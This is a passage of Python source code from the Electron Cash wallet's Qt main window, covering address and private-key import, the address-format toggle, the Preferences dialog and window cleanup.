self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
if not self.amount_e.isVisible():
self.fiat_send_e.setVisible(False)
else:
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
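    # Return the status-bar icon matching the configured address format (legacy, CashAddr or SLP).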
def cashaddr_icon(self):
if self.config.get('addr_format', 0) == 1:
return QIcon(":icons/tab_converter.svg")
elif self.config.get('addr_format', 0)==2:
return QIcon(":icons/tab_converter_slp.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(self.config.get('addr_format', 2))
def toggle_cashaddr_settings(self,state):
self.toggle_cashaddr(state, True)
def toggle_cashaddr(self, format, specified = False):
        # GUI toggle should just increment; if "specified" is True it is being set from preferences, so leave the value as-is.
if specified==False:
if self.is_slp_wallet:
max_format=2
else:
max_format=1
format+=1
if format > max_format:
format=0
self.config.set_key('addr_format', format)
Address.show_cashaddr(format)
self.setAddrFormatText(format)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def setAddrFormatText(self, format):
try:
if format == 0:
self.addr_format_label.setText("Addr Format: Legacy")
elif format == 1:
self.addr_format_label.setText("Addr Format: Cash")
else:
self.addr_format_label.setText("Addr Format: SLP")
except AttributeError:
pass
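    # Preferences dialog: builds the General, Fees & Misc., Transactions and Fiat tabs from the widget lists assembled below.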
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
misc_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
addr_format_choices = ["Legacy Format","CashAddr Format","SLP Format"]
addr_format_dict={'Legacy Format':0,'CashAddr Format':1,'SLP Format':2}
msg = _('Choose which format the wallet displays for Bitcoin Cash addresses')
addr_format_label = HelpLabel(_('Address Format') + ':', msg)
addr_format_combo = QComboBox()
addr_format_combo.addItems(addr_format_choices)
addr_format_combo.setCurrentIndex(self.config.get("addr_format", 0))
addr_format_combo.currentIndexChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((addr_format_label,addr_format_combo))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
if self.fee_custom_lbl.text() == '':
self.fee_slider_mogrifier(self.get_custom_fee_text())
else:
self.fee_slider_mogrifier()
fee_gb = QGroupBox(_('Fees'))
fee_lo = QGridLayout(fee_gb)
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_lo.addWidget(customfee_label, 0, 0, 1, 1, Qt.AlignRight)
fee_lo.addWidget(customfee_e, 0, 1, 1, 1, Qt.AlignLeft)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_lo.addWidget(feebox_cb, 1, 0, 1, 2, Qt.AlignJustify)
# Fees box up top
misc_widgets.append((fee_gb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_gb = QGroupBox(_("Identity"))
id_form = QFormLayout(id_gb)
id_form.addRow(alias_label, alias_e)
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_form.addRow(SSL_id_label, SSL_id_e)
# Identity box in middle of this tab
misc_widgets.append((id_gb, None)) # commit id_form/id_gb to master layout via this data structure
from . import exception_window as ew
cr_gb = QGroupBox(_("Crash Reporter"))
cr_grid = QGridLayout(cr_gb)
cr_chk = QCheckBox()
cr_chk.setChecked(ew.is_enabled(self.config))
cr_chk.clicked.connect(lambda b: ew.set_enabled(self.config, b))
cr_help = HelpLabel(_("Crash reporter enabled"),
_("The crash reporter is the error window which pops-up when Electron Cash encounters an internal error.\n\n"
"It is recommended that you leave this option enabled, so that developers can be notified of any internal bugs. "
"When a crash is encountered you are asked if you would like to send a report.\n\n"
"Private information is never revealed in crash reports to developers."))
# The below dance ensures the checkbox is horizontally centered in the widget
cr_grid.addWidget(QWidget(), 0, 0, 1, 1) # dummy spacer
cr_grid.addWidget(cr_chk, 0, 1, 1, 1, Qt.AlignRight)
cr_grid.addWidget(cr_help, 0, 2, 1, 1, Qt.AlignLeft)
cr_grid.addWidget(QWidget(), 0, 3, 1, 1) # dummy spacer
cr_grid.setColumnStretch(0, 1)
cr_grid.setColumnStretch(3, 1)
# Crash reporter box at bottom of this tab
misc_widgets.append((cr_gb, None)) # commit crash reporter gb to layout
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
              + _(' These settings affect the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished: # dialog_finished guard needed because QueuedConnection
# already scanned or dialog finished quickly
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
                hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off)"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
                _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
                # hmm, the previous exchange isn't available under the new currency/history setting. Try the default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
self.slp_history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
tabs_info = [
(gui_widgets, _('General')),
(misc_widgets, pgettext("The preferences -> Fees,misc tab", 'Fees && Misc.')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
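# Lay out one (left, right) widget pair on a fresh grid row; a lone left widget spans both columns, and (None, None) inserts a spacer row.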
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
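# Disconnect every pyqtSignal attribute of this window (named *_signal by convention) and stop any RateLimiter timers attached to it.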
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
# Work-around to PyQt bugs. See EC issue #1532
try: self.gui_object.update_available_signal.disconnect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
if self.wallet.ui_emit_validity_updated:
self.wallet.ui_emit_validity_updated = None # detach callback
if self.wallet.ui_emit_validation_fetch:
self.wallet.ui_emit_validation_fetch = None
self.tx_update_mgr.clean_up() # disconnects some signals
# We catch these errors with the understanding that there is no recovery at
# this point, given the user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
for d in list(self._slp_dialogs):
d.close() # make sure dialogs we created are properly closed!
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server
# (due to ElectrumX protocol limitations), but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(self.top_level_window(), _('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
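# Create the plugin's settings widget on demand (column 1 of its grid row) when the plugin instance p is loaded and requires one; remove and delete it again if the plugin has been unloaded.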
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
